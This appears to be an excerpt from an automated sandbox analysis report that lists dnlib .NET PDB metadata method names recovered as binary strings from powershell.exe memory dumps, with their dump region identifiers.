                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
